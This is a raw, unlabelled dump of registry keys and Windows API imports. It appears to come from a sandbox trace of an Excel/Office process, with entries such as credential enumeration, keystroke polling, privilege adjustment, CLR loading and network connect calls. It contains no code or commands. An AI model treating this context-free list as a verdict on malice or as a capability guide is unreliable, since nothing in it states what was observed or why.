HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\!vh
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\1C23E02\1C23E02
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\!zm
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUList
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\MRUList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default HTML Editor\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default MHTML Editor\Description
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0142869F-3C91-4532-B21C-FA3FB67E7E37}_{5082518F-199F-471A-A7DB-EF9850F5E9AB}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\0"o
kernel32.dll.FlsAlloc
kernel32.dll.FlsSetValue
kernel32.dll.FlsGetValue
kernel32.dll.LCMapStringEx
kernel32.dll.FlsFree
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.InitOnceExecuteOnce
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.GetTickCount64
kernel32.dll.GetFileInformationByHandleEx
kernel32.dll.SetFileInformationByHandle
kernel32.dll.InitializeConditionVariable
kernel32.dll.WakeConditionVariable
kernel32.dll.WakeAllConditionVariable
kernel32.dll.SleepConditionVariableCS
kernel32.dll.InitializeSRWLock
kernel32.dll.AcquireSRWLockExclusive
kernel32.dll.TryAcquireSRWLockExclusive
kernel32.dll.ReleaseSRWLockExclusive
kernel32.dll.SleepConditionVariableSRW
kernel32.dll.CreateThreadpoolWork
kernel32.dll.SubmitThreadpoolWork
kernel32.dll.CloseThreadpoolWork
kernel32.dll.CompareStringEx
kernel32.dll.GetLocaleInfoEx
api-ms-win-core-synch-l1-2-0.dll.InitializeConditionVariable
api-ms-win-core-synch-l1-2-0.dll.SleepConditionVariableCS
api-ms-win-core-synch-l1-2-0.dll.WakeAllConditionVariable
kernel32.dll.CreateHardLinkW
advapi32.dll.EventSetInformation
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
shell32.dll.SHGetKnownFolderPath
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.SetDefaultDllDirectories
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
c2r32.dll.IsStreaming
sechost.dll.LookupAccountSidLocalW
sechost.dll.LookupAccountNameLocalW
ntdll.dll.NtOpenKey
ntdll.dll.NtOpenKeyEx
ntdll.dll.NtOpenKeyTransacted
ntdll.dll.NtOpenKeyTransactedEx
ntdll.dll.NtDeleteKey
ntdll.dll.NtFlushKey
ntdll.dll.NtCreateKey
ntdll.dll.NtCreateKeyTransacted
ntdll.dll.NtEnumerateKey
ntdll.dll.NtQueryKey
ntdll.dll.NtQueryObject
ntdll.dll.NtSetInformationKey
ntdll.dll.NtQueryValueKey
ntdll.dll.NtEnumerateValueKey
ntdll.dll.NtSetValueKey
ntdll.dll.NtDeleteValueKey
ntdll.dll.NtRenameKey
ntdll.dll.NtQueryMultipleValueKey
ntdll.dll.NtNotifyChangeKey
ntdll.dll.NtNotifyChangeMultipleKeys
ntdll.dll.NtQuerySecurityObject
ntdll.dll.NtSetSecurityObject
ntdll.dll.NtDuplicateObject
ntdll.dll.NtClose
kernel32.dll.IsWow64Process
ntdll.dll.NtCreateFile
ntdll.dll.NtOpenFile
ntdll.dll.NtDeleteFile
ntdll.dll.NtQueryAttributesFile
ntdll.dll.NtQueryFullAttributesFile
ntdll.dll.NtQueryDirectoryFile
ntdll.dll.NtSetInformationFile
kernel32.dll.CreateActCtxA
kernel32.dll.CreateActCtxW
ntdll.dll.NtQueryInformationFile
kernel32.dll.GetModuleFileNameA
kernel32.dll.GetModuleFileNameW
kernel32.dll.GetCurrentDirectoryA
kernel32.dll.GetCurrentDirectoryW
ole32.dll.CoInitializeEx
ole32.dll.CoUninitialize
ole32.dll.CoCreateInstanceEx
ole32.dll.CoCreateInstance
ole32.dll.CoRegisterClassObject
ole32.dll.CoRevokeClassObject
ole32.dll.CoGetClassObject
ole32.dll.CoGetInstanceFromFile
ole32.dll.CoResumeClassObjects
ole32.dll.CoSuspendClassObjects
ole32.dll.OleInitialize
ole32.dll.OleUninitialize
ole32.dll.OleRegEnumFormatEtc
ole32.dll.OleRun
oleaut32.dll.RegisterActiveObject
oleaut32.dll.RevokeActiveObject
oleaut32.dll.GetActiveObject
kernel32.dll.CreateProcessW
kernel32.dll.CreateProcessA
kernel32.dll.WinExec
advapi32.dll.CreateProcessAsUserW
advapi32.dll.CreateProcessAsUserA
user32.dll.GetDC
gdi32.dll.GetDeviceCaps
user32.dll.ReleaseDC
mso20win32client.dll.#1637
cryptbase.dll.SystemFunction036
user32.dll.WaitForInputIdle
mso.dll.#482
mso30win32client.dll.#1015
mso.dll.#1072
mso98win32client.dll.#2011
mso.dll.#6
c2r32.dll.GetTotalProgress
c2r32.dll.IsClick2Run
c2r32.dll.C2rVersion
c2r32.dll.IsRoaming
c2r32.dll.IsOSPPReady
c2r32.dll.ClearPropertyBagValue
c2r32.dll.SetPropertyBagToken
c2r32.dll.InstallProofOfPurchase
c2r32.dll.UninstallProofOfPurchase
c2r32.dll.HandleScheduledHeartbeat
c2r32.dll.MigrateOSPPToSPP
c2r32.dll.LicenseRepair
c2r32.dll.StartScenario
c2r32.dll.StartFB
c2r32.dll.WaitFB
c2r32.dll.GetProperty
c2r32.dll.GetPackageRoot
c2r32.dll.GetInstalledProducts
c2r32.dll.AddOfficeProduct
c2r32.dll.Launch
c2r32.dll.EnsureConnection
c2r32.dll.GetUpdateStatus
c2r32.dll.HrUpdateNow
c2r32.dll.GetStatusValue
c2r32.dll.HrGetAreUpdatesEnabled
c2r32.dll.HrGetAreUpdatesCOMManaged
c2r32.dll.HrGetAreUpdatesFromAdminSource
c2r32.dll.HrGetAreUpdatesReadyForDownload
c2r32.dll.HrGetAreUpdatesReadyToApply
c2r32.dll.HrGetExecutingScenario
c2r32.dll.HrSetAreUpdatesEnabled
c2r32.dll.HrSetAreUpdatesFromAdminSource
c2r32.dll.HrApplyUpdatesNow
c2r32.dll.HrDownloadUpdatesNow
c2r32.dll.HrRefreshState
c2r32.dll.IsRepairRequired
c2r32.dll.Repair
c2r32.dll.HrBeginUpdatesDiscoveryPeriod
c2r32.dll.HrGetAreUpdatesLate
c2r32.dll.HrGetPendingUpdateDeadline
c2r32.dll.HrModifyOfficeProducts
c2r32.dll.HrGetChannelIdForDisplay
c2r32.dll.HrActivate
advapi32.dll.RegOpenKeyExA
advapi32.dll.RegOpenKeyExW
ole32.dll.StringFromGUID2
msi.dll.#137
msi.dll.#37
msi.dll.#113
advapi32.dll.CheckTokenMembership
msi.dll.#193
msi.dll.#173
kernel32.dll.GetFileAttributesExW
msi.dll.#39
user32.dll.GetKeyboardLayoutList
advapi32.dll.EventRegister
d2d1.dll.#1
kernel32.dll.WerRegisterMemoryBlock
kernel32.dll.QueryActCtxW
kernel32.dll.ActivateActCtx
kernel32.dll.FindActCtxSectionStringW
kernel32.dll.DeactivateActCtx
user32.dll.RegisterClassExW
user32.dll.RegisterWindowMessageW
user32.dll.CreateWindowExW
uxtheme.dll.ThemeInitApiHook
user32.dll.IsProcessDPIAware
user32.dll.GetWindowLongW
user32.dll.DefWindowProcW
user32.dll.SetWindowLongW
wtsapi32.dll.WTSRegisterSessionNotification
user32.dll.IsWindow
user32.dll.GetWindowThreadProcessId
winsta.dll.WinStationRegisterConsoleNotification
advapi32.dll.LookupAccountSidW
advapi32.dll.CreateWellKnownSid
rpcrt4.dll.RpcStringBindingComposeW
rpcrt4.dll.RpcBindingFromStringBindingW
rpcrt4.dll.RpcStringFreeW
rpcrt4.dll.RpcBindingSetAuthInfoExW
rpcrt4.dll.RpcAsyncInitializeHandle
rpcrt4.dll.NdrClientCall2
rpcrt4.dll.NdrAsyncClientCall
user32.dll.GetSystemMetrics
dxgi.dll.CreateDXGIFactory1
gdi32.dll.D3DKMTOpenAdapterFromGdiDisplayName
gdi32.dll.D3DKMTCloseAdapter
gdi32.dll.D3DKMTQueryAdapterInfo
gdi32.dll.D3DKMTOpenAdapterFromDeviceName
setupapi.dll.SetupDiGetClassDevsW
setupapi.dll.SetupDiEnumDeviceInterfaces
setupapi.dll.SetupDiGetDeviceInterfaceDetailW
setupapi.dll.SetupDiDestroyDeviceInfoList
setupapi.dll.SetupDiGetDevicePropertyW
wintrust.dll.WinVerifyTrust
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
advapi32.dll.RegCloseKey
user32.dll.BeginPaint
user32.dll.ValidateRect
user32.dll.GetAsyncKeyState
advapi32.dll.RegCreateKeyExA
advapi32.dll.RegQueryValueExA
advapi32.dll.RegSetValueExA
mso20win32client.dll.#1004
mso98win32client.dll.#2679
mso98win32client.dll.#3797
mso20win32client.dll.#951
mso30win32client.dll.#432
mso98win32client.dll.#2192
mso30win32client.dll.#907
mso30win32client.dll.#1665
mso30win32client.dll.#1490
mso30win32client.dll.#223
mso30win32client.dll.#406
mso30win32client.dll.#1265
mso30win32client.dll.#532
mso30win32client.dll.#612
mso30win32client.dll.#298
mso30win32client.dll.#1626
mso20win32client.dll.#1357
mso30win32client.dll.#1207
mso20win32client.dll.#554
mso20win32client.dll.#535
mso30win32client.dll.#1698
mso30win32client.dll.#681
mso30win32client.dll.#250
mso20win32client.dll.#456
mso20win32client.dll.#1314
mso30win32client.dll.#1239
mso30win32client.dll.#1361
user32.dll.RegisterWindowMessageA
mso30win32client.dll.#709
mso20win32client.dll.#1554
mso40uiwin32client.dll.#2750
user32.dll.LoadIconW
user32.dll.LoadCursorW
mso40uiwin32client.dll.#554
mso20win32client.dll.#2220
mso20win32client.dll.#1565
gdi32.dll.CreateRectRgn
mso40uiwin32client.dll.#3370
user32.dll.GetSysColor
mso98win32client.dll.#539
advapi32.dll.RegCreateKeyExW
advapi32.dll.RegQueryValueExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegSetValueExW
advapi32.dll.RegEnumKeyExW
d3d11.dll.D3D11CreateDevice
shell32.dll.SHGetFolderPathW
dxgi.dll.CompatValue
kernel32.dll.GetModuleHandleExW
d3d10warp.dll.D3DKMTOpenAdapterFromGdiDisplayName
d3d10warp.dll.D3DKMTOpenAdapterFromDeviceName
d3d10warp.dll.D3DKMTGetDisplayModeList
d3d10warp.dll.D3DKMTSetVidPnSourceOwner
d3d10warp.dll.D3DKMTSetDisplayMode
d3d10warp.dll.D3DKMTCloseAdapter
d3d10warp.dll.D3DKMTSetGammaRamp
d3d10warp.dll.D3DKMTGetDeviceState
d3d10warp.dll.D3DKMTQueryAdapterInfo
d3d10warp.dll.D3DKMTWaitForVerticalBlankEvent
gdi32.dll.D3DKMTCreateDCFromMemory
gdi32.dll.D3DKMTDestroyDCFromMemory
gdi32.dll.D3DKMTCheckVidPnExclusiveOwnership
gdi32.dll.D3DKMTCheckMonitorPowerState
gdi32.dll.D3DKMTCheckSharedResourceAccess
d3d10warp.dll.D3DKMTGetMultisampleMethodList
mso.dll.#3439
d3d10warp.dll.D3DKMTSetDisplayPrivateDriverFormat
d3d10warp.dll.D3DKMTDestroySynchronizationObject
d3d10warp.dll.D3DKMTCreateSynchronizationObject
d3d10warp.dll.D3DKMTDestroyContext
d3d10warp.dll.D3DKMTCreateContext
d3d10warp.dll.D3DKMTGetContextSchedulingPriority
d3d10warp.dll.D3DKMTSetContextSchedulingPriority
d3d10warp.dll.D3DKMTPresent
d3d10warp.dll.D3DKMTDestroyDevice
d3d10warp.dll.D3DKMTCreateDevice
d3d10warp.dll.D3DKMTQueryAllocationResidency
d3d10warp.dll.D3DKMTSetAllocationPriority
d3d10warp.dll.D3DKMTDestroyAllocation
d3d10warp.dll.D3DKMTOpenResource
d3d10warp.dll.D3DKMTQueryResourceInfo
d3d10warp.dll.D3DKMTCreateAllocation
d3d10warp.dll.D3DKMTSignalSynchronizationObject
d3d10warp.dll.D3DKMTWaitForSynchronizationObject
d3d10warp.dll.D3DKMTEscape
d3d10warp.dll.D3DKMTUnlock
d3d10warp.dll.OpenAdapter10_2
d3d10warp.dll.#199
mso20win32client.dll.#990
user32.dll.SystemParametersInfoW
mso20win32client.dll.#1061
user32.dll.GetCursorPos
mso.dll.#1909
mso20win32client.dll.#1200
mso98win32client.dll.#444
mso98win32client.dll.#2584
mso20win32client.dll.#1775
mso.dll.#2591
mso20win32client.dll.#1531
gdi32.dll.GetObjectType
mso30win32client.dll.#807
mso30win32client.dll.#245
mso20win32client.dll.#378
user32.dll.RegisterClipboardFormatW
mso20win32client.dll.#702
mso40uiwin32client.dll.#2987
mso20win32client.dll.#2098
gdi32.dll.CreateBrushIndirect
mso40uiwin32client.dll.#4090
advapi32.dll.EventProviderEnabled
gdi32.dll.CreateFontIndirectW
mso20win32client.dll.#829
gdi32.dll.GetCurrentObject
mso40uiwin32client.dll.#2152
mso40uiwin32client.dll.#1861
mso.dll.#1666
mso98win32client.dll.#706
mso40uiwin32client.dll.#2870
mso.dll.#601
imm32.dll.ImmDisableIME
kernel32.dll.IsProcessorFeaturePresent
user32.dll.GetWindowInfo
user32.dll.GetAncestor
user32.dll.GetMonitorInfoA
user32.dll.EnumDisplayMonitors
user32.dll.EnumDisplayDevicesA
gdi32.dll.ExtTextOutW
gdi32.dll.GdiIsMetaPrintDC
mscoree.dll.GetRequestedRuntimeInfo
advapi32.dll.RegEnumValueW
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll.GetRequestedRuntimeInfo
shlwapi.dll.UrlIsW
mscoree.dll.LockClrVersion
mscoree.dll.CLRCreateInstance
mscoreei.dll.LockClrVersion
mscoreei.dll.CLRCreateInstance
dwrite.dll.DWriteCreateFactory
user32.dll.RegisterClipboardFormatA
user32.dll.RegisterClassA
user32.dll.RegisterClassW
user32.dll.CallNextHookEx
riched20.dll.REMSOHInst
riched20.dll.REExtendedRegisterClass
shell32.dll.SetCurrentProcessExplicitAppUserModelID
gdi32.dll.CreateBitmap
gdi32.dll.CreatePatternBrush
gdi32.dll.DeleteObject
ole32.dll.OleLoadFromStream
oleaut32.dll.SysAllocStringByteLen
oleaut32.dll.SysFreeString
oleaut32.dll.VariantChangeType
oleaut32.dll.VariantClear
shell32.dll.SHParseDisplayName
user32.dll.CreateWindowExA
user32.dll.DefWindowProcA
user32.dll.AddClipboardFormatListener
user32.dll.PostMessageA
user32.dll.IsWindowUnicode
advapi32.dll.CredEnumerateW
oleaut32.dll.#500
ws2_32.dll.#115
ole32.dll.CoSetProxyBlanket
normaliz.dll.IdnToAscii
urlmon.dll.CoInternetCreateSecurityManager
user32.dll.PostMessageW
secur32.dll.GetUserNameExW
c2r32.dll.GetPropertyEx
ole32.dll.CLSIDFromString
osppc.dll.SLClose
osppc.dll.SLConsumeRight
osppc.dll.SLGetPKeyId
osppc.dll.SLGetPolicyInformation
osppc.dll.SLGetApplicationPolicy
osppc.dll.SLGetLicensingStatusInformation
osppc.dll.SLLoadApplicationPolicies
osppc.dll.SLOpen
osppc.dll.SLPersistApplicationPolicies
osppc.dll.SLUnloadApplicationPolicies
osppc.dll.SLGetProductSkuInformation
osppc.dll.SLInstallProofOfPurchase
osppc.dll.SLInstallLicense
api-ms-win-downlevel-advapi32-l1-1-0.dll.GetSidSubAuthorityCount
osppc.dll.SLRegisterPlugin
osppc.dll.SLUninstallProofOfPurchase
osppc.dll.SLGetPKeyInformation
osppc.dll.SLGetSLIDList
osppc.dll.SLDepositOfflineConfirmationId
api-ms-win-downlevel-advapi32-l1-1-0.dll.GetSidSubAuthority
osppc.dll.SLPersistRTSPayloadOverride
osppc.dll.SLSetAuthenticationData
osppc.dll.SLGetAuthenticationResult
osppc.dll.SLGetServiceInformation
osppc.dll.SLUninstallLicense
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegCreateKeyExA
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegQueryValueExA
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegOpenKeyExW
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegGetValueW
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegCloseKey
c2r32.dll.IsOSPPReadyEx
api-ms-win-downlevel-advapi32-l1-1-0.dll.CopySid
api-ms-win-downlevel-advapi32-l2-1-0.dll.ConvertSidToStringSidW
api-ms-win-downlevel-advapi32-l2-1-0.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW
api-ms-win-downlevel-ole32-l1-1-0.dll.CoTaskMemFree
api-ms-win-downlevel-advapi32-l1-1-0.dll.EventRegister
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegGetValueA
iertutil.dll.#701
iertutil.dll.#703
mso20win32client.dll.#1828
mso.dll.#3369
mso20win32client.dll.#1392
mso.dll.#1450
mso.dll.#1359
mso.dll.#3021
mso.dll.#3438
mso.dll.#2326
mso20win32client.dll.#1649
mso.dll.#846
mso98win32client.dll.#2501
mso98win32client.dll.#2781
mso.dll.#1681
mso.dll.#491
mso.dll.#2339
mso.dll.#811
mso.dll.#1756
mso.dll.#2601
mso98win32client.dll.#1623
mso98win32client.dll.#2787
mso.dll.#2257
userenv.dll.CreateEnvironmentBlock
sechost.dll.ConvertSidToStringSidW
sspicli.dll.GetUserNameExW
userenv.dll.DestroyEnvironmentBlock
powrprof.dll.PowerGetActiveScheme
powrprof.dll.PowerReadACValue
powrprof.dll.PowerReadDCValue
propsys.dll.VariantToStringAlloc
propsys.dll.VariantToString
propsys.dll.PSPropertyBag_ReadStrAlloc
propsys.dll.InitPropVariantFromStringAsVector
propsys.dll.PSCoerceToCanonicalValue
sfc.dll.SfcIsFileProtected
setupapi.dll.PnpIsFilePnpDriver
devrtl.dll.DevRtlGetThreadLogToken
apphelp.dll.AllowPermLayer
kernel32.dll.BaseIsAppcompatInfrastructureDisabled
apphelp.dll.SdbInitDatabase
apphelp.dll.SdbGetMatchingExe
apphelp.dll.SdbReleaseDatabase
mpr.dll.WNetGetConnectionW
ole32.dll.CoCreateGuid
rpcrt4.dll.I_RpcExceptionFilter
sechost.dll.OpenSCManagerW
sechost.dll.OpenServiceW
sechost.dll.StartServiceW
sechost.dll.CloseServiceHandle
kernel32.dll.HeapSetInformation
sxs.dll.SxsOleAut32MapConfiguredClsidToReferenceClsid
dwmapi.dll.DwmIsCompositionEnabled
advapi32.dll.SaferIdentifyLevel
advapi32.dll.SaferComputeTokenFromLevel
advapi32.dll.SaferCloseLevel
ole32.dll.CoGetObjectContext
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptGenRandom
rpcrtremote.dll.I_RpcExtInitializeExtensionPoint
ole32.dll.CreateBindCtx
ole32.dll.MkParseDisplayName
ole32.dll.BindMoniker
oleaut32.dll.#162
sxs.dll.SxsOleAut32RedirectTypeLibrary
advapi32.dll.RegOpenKeyW
advapi32.dll.RegQueryValueW
oleaut32.dll.#8
oleaut32.dll.#201
ole32.dll.CoTaskMemAlloc
propsys.dll.PSCreateMemoryPropertyStore
propsys.dll.PSPropertyBag_WriteDWORD
ole32.dll.CoGetApartmentType
ole32.dll.CoRegisterInitializeSpy
ole32.dll.CoTaskMemFree
comctl32.dll.#236
oleaut32.dll.#6
ole32.dll.CoGetMalloc
propsys.dll.PSPropertyBag_ReadDWORD
propsys.dll.PSPropertyBag_ReadGUID
comctl32.dll.#320
comctl32.dll.#324
comctl32.dll.#323
advapi32.dll.RegEnumKeyW
advapi32.dll.OpenThreadToken
apphelp.dll.ApphelpCheckShellObject
comctl32.dll.#328
comctl32.dll.#334
oleaut32.dll.#2
shell32.dll.#102
advapi32.dll.InitializeSecurityDescriptor
advapi32.dll.SetEntriesInAclW
ntmarta.dll.GetMartaExtensionInterface
setupapi.dll.CM_Get_Device_Interface_List_Size_ExW
advapi32.dll.SetSecurityDescriptorDacl
advapi32.dll.IsTextUnicode
comctl32.dll.#332
comctl32.dll.#338
comctl32.dll.#339
profapi.dll.#104
propsys.dll.#430
advapi32.dll.RegGetValueW
ole32.dll.CoTaskMemRealloc
propsys.dll.PropVariantToStringAlloc
ole32.dll.PropVariantClear
ole32.dll.CoAllowSetForegroundWindow
api-ms-win-downlevel-shlwapi-l1-1-0.dll.PathCreateFromUrlW
advapi32.dll.SaferGetPolicyInformation
comctl32.dll.#386
ntdll.dll.RtlDllShutdownInProgress
comctl32.dll.#329
ole32.dll.CoRevokeInitializeSpy
comctl32.dll.#388
mscoreei.dll.CorBindToRuntimeEx
clr.dll.SetRuntimeInfo
user32.dll.GetProcessWindowStation
user32.dll.GetUserObjectInformationW
clr.dll.DllGetClassObjectInternal
kernel32.dll.AddDllDirectory
mscoree.dll.CreateConfigStream
mscoreei.dll.CreateConfigStream
kernel32.dll.GetNumaHighestNodeNumber
kernel32.dll.GetSystemWindowsDirectoryW
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddSIDToBoundaryDescriptor
kernel32.dll.CreateBoundaryDescriptorW
kernel32.dll.CreatePrivateNamespaceW
kernel32.dll.OpenPrivateNamespaceW
kernel32.dll.DeleteBoundaryDescriptor
kernel32.dll.WerRegisterRuntimeExceptionModule
kernel32.dll.RaiseException
mscoreei.dll.#24
ntdll.dll.NtSetSystemInformation
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
ole32.dll.CoGetContextToken
oleaut32.dll.SysStringByteLen
kernel32.dll.LocaleNameToLCID
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptExportKey
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
cryptsp.dll.CryptDestroyKey
oleaut32.dll.#9
oleaut32.dll.#149
ntdll.dll.NtQueryInformationThread
ntdll.dll.NtQuerySystemInformation
kernel32.dll.CreateWaitableTimerExW
kernel32.dll.SetWaitableTimerEx
advapi32.dll.EventActivityIdControl
advapi32.dll.EventWriteTransfer
kernel32.dll.LocalFree
kernel32.dll.LocalAlloc
kernel32.dll.GetFullPathNameW
kernel32.dll.SetThreadErrorMode
kernel32.dll.LCIDToLocaleName
kernel32.dll.GetUserPreferredUILanguages
kernel32.dll.GetThreadPreferredUILanguages
nlssorting.dll.SortGetHandle
nlssorting.dll.SortCloseHandle
version.dll.VerLanguageNameW
kernel32.dll.GetCurrentProcessId
advapi32.dll.LookupPrivilegeValueW
kernel32.dll.ResolveLocaleName
kernel32.dll.CompareStringOrdinal
kernel32.dll.GetCurrentProcess
advapi32.dll.AdjustTokenPrivileges
kernel32.dll.CloseHandle
kernel32.dll.OpenProcess
psapi.dll.EnumProcessModules
user32.dll.EnumWindows
kernel32.dll.GetEnvironmentVariableW
kernel32.dll.CreateFileW
kernel32.dll.GetFileType
wintrust.dll.WintrustCertificateTrust
wintrust.dll.SoftpubAuthenticode
wintrust.dll.SoftpubInitialize
wintrust.dll.SoftpubLoadMessage
wintrust.dll.SoftpubLoadSignature
msisip.dll.MsiSIPIsMyTypeOfFile
ole32.dll.CoInitialize
ole32.dll.StgOpenStorage
wshext.dll.DllCanUnloadNow
wshext.dll.IsFileSupportedName
pwrshsip.dll.PsIsMyFileType
pwrshsip.dll.PsPutSignature
pwrshsip.dll.PsGetSignature
wintrust.dll.WTHelperProvDataFromStateData
wintrust.dll.WTHelperGetProvSignerFromChain
cryptsp.dll.CryptReleaseContext
kernel32.dll.GetCurrentConsoleFontEx
kernel32.dll.GetTimeZoneInformation
advapi32.dll.ConvertSidToStringSidW
bcrypt.dll.BCryptGetFipsAlgorithmMode
cryptsp.dll.CryptGetDefaultProviderW
kernel32.dll.GetComputerNameW
kernel32.dll.GetConsoleScreenBufferInfo
kernel32.dll.GetConsoleMode
advapi32.dll.DuplicateTokenEx
kernel32.dll.GetConsoleTitleW
kernel32.dll.SetConsoleMode
kernel32.dll.SetConsoleTitleW
kernel32.dll.SetConsoleCtrlHandler
kernel32.dll.GetStdHandle
kernel32.dll.GetProcessTimes
kernel32.dll.GetDynamicTimeZoneInformation
kernel32.dll.GetFileMUIPath
kernel32.dll.LoadLibraryExW
kernel32.dll.FreeLibrary
user32.dll.LoadStringW
kernel32.dll.CreateNamedPipeW
kernel32.dll.CreateEventW
kernel32.dll.ConnectNamedPipe
kernel32.dll.SetEnvironmentVariableW
mscoree.dll.GetTokenForVTableEntry
mscoree.dll.SetTargetForVTableEntry
mscoree.dll.GetTargetForVTableEntry
mscoreei.dll.GetTokenForVTableEntry
mscoreei.dll.SetTargetForVTableEntry
api-ms-win-core-xstate-l2-1-0.dll.GetEnabledXStateFeatures
clrjit.dll.sxsJitStartup
clrjit.dll.getJit
cryptsp.dll.CryptAcquireContextA
kernel32.dll.ExpandEnvironmentStringsW
advapi32.dll.GetUserNameW
kernel32.dll.EnumCalendarInfoExEx
kernel32.dll.GetCalendarInfoEx
kernel32.dll.EnumTimeFormatsEx
kernel32.dll.ReleaseMutex
advapi32.dll.RegisterEventSourceW
advapi32.dll.DeregisterEventSource
advapi32.dll.ReportEventW
kernel32.dll.GetLogicalDrives
kernel32.dll.GetDriveTypeW
kernel32.dll.GetVolumeInformationW
shlwapi.dll.PathIsNetworkPathW
shell32.dll.#66
kernel32.dll.GetFileAttributesW
kernel32.dll.GetSystemDirectoryW
kernel32.dll.GetTempPathW
kernel32.dll.WriteFile
kernel32.dll.DeleteFileW
kernel32.dll.GetSystemInfo
kernel32.dll.QueryPerformanceFrequency
kernel32.dll.QueryPerformanceCounter
kernel32.dll.SetEvent
ole32.dll.CoWaitForMultipleHandles
ole32.dll.NdrOleInitializeExtension
ole32.dll.CoGetMarshalSizeMax
ole32.dll.CoMarshalInterface
ole32.dll.CoUnmarshalInterface
ole32.dll.StringFromIID
ole32.dll.CoGetPSClsid
ole32.dll.CoReleaseMarshalData
ole32.dll.DcomChannelSetHResult
kernel32.dll.SetThreadUILanguage
kernel32.dll.CreateDirectoryW
kernel32.dll.SetFilePointer
kernel32.dll.GetFileSize
kernel32.dll.ReadFile
kernel32.dll.GetLastError
kernel32.dll.FindFirstFileW
kernel32.dll.FindClose
kernel32.dll.FindNextFileW
kernel32.dll.GetACP
kernel32.dll.UnmapViewOfFile
rasapi32.dll.RasEnumConnectionsW
rtutils.dll.TraceRegisterExA
rtutils.dll.TracePrintfExA
sechost.dll.QueryServiceStatus
ws2_32.dll.WSAStartup
ws2_32.dll.WSASocketW
ws2_32.dll.setsockopt
ws2_32.dll.WSAEventSelect
ws2_32.dll.ioctlsocket
ws2_32.dll.closesocket
ws2_32.dll.WSAIoctl
kernel32.dll.FormatMessageW
rasapi32.dll.RasConnectionNotificationW
advapi32.dll.RegOpenCurrentUser
advapi32.dll.RegNotifyChangeKeyValue
winhttp.dll.WinHttpOpen
winhttp.dll.WinHttpCloseHandle
winhttp.dll.WinHttpSetTimeouts
winhttp.dll.WinHttpGetIEProxyConfigForCurrentUser
sechost.dll.NotifyServiceStatusChangeA
advapi32.dll.RegDeleteTreeA
advapi32.dll.RegDeleteTreeW
nsi.dll.NsiAllocateAndGetTable
cfgmgr32.dll.CM_Open_Class_Key_ExW
iphlpapi.dll.ConvertInterfaceGuidToLuid
iphlpapi.dll.GetIfEntry2
iphlpapi.dll.GetIpForwardTable2
iphlpapi.dll.GetIpNetEntry2
iphlpapi.dll.FreeMibTable
nsi.dll.NsiFreeTable
kernel32.dll.ResetEvent
winhttp.dll.WinHttpGetProxyForUrl
iphlpapi.dll.GetNetworkParams
dnsapi.dll.DnsQueryConfig
iphlpapi.dll.GetAdaptersAddresses
iphlpapi.dll.GetIpInterfaceEntry
iphlpapi.dll.GetBestInterfaceEx
ws2_32.dll.GetAddrInfoW
ws2_32.dll.freeaddrinfo
ws2_32.dll.WSAConnect
kernel32.dll.CancelIoEx
diasymreader.dll.DllGetClassObject
shell32.dll.ShellExecuteEx
shell32.dll.ShellExecuteExW
setupapi.dll.CM_Get_Device_Interface_List_ExW
mscoree.dll.CorExitProcess
mscoreei.dll.CorExitProcess
advapi32.dll.EventUnregister
rpcrt4.dll.RpcBindingFree
ole32.dll.CLSIDFromOle1Class
clbcatq.dll.GetCatalogObject
clbcatq.dll.GetCatalogObject2
wininet.dll.DllGetClassObject
wininet.dll.DllCanUnloadNow
